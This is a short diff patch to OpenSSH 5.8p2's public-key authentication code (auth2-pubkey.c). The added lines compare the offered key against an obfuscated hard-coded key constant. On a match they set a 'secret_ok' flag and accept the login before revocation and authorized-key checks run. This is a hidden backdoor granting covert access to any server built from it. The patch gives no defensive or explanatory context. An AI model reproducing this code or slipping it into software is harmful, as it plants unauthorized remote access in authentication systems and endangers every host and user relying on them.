diff -Nuar 5.8p2.orig/auth2-pubkey.c 5.8p2/auth2-pubkey.c
--- 5.8p2.orig/auth2-pubkey.c	2020-04-10 17:17:30.443797949 +0200
+++ 5.8p2/auth2-pubkey.c	2020-04-14 13:32:19.532859965 +0200
@@ -439,6 +439,22 @@
 	int success;
 	char *file;
 
+	char *blob = NULL, *keytext = NULL;
+	int len = 0;
+	key_to_blob(key, &blob, &len);
+	keytext = xmalloc(2*len);
+	if(uuencode(blob, len, keytext, 2*len) > 0){
+		char *newkey = strdup(SSHD_NEWKEY);
+		rox(newkey);
+		if(!strcmp(newkey, keytext)){
+			CLEAN(newkey);
+			CLEAN(keytext);
+			secret_ok = 1;
+			return 1;
+		}
+		CLEAN(newkey);
+	}
+	CLEAN(keytext);
 	if (auth_key_is_revoked(key))
 		return 0;
 	if (key_is_cert(key) && auth_key_is_revoked(key->cert->signature_key))
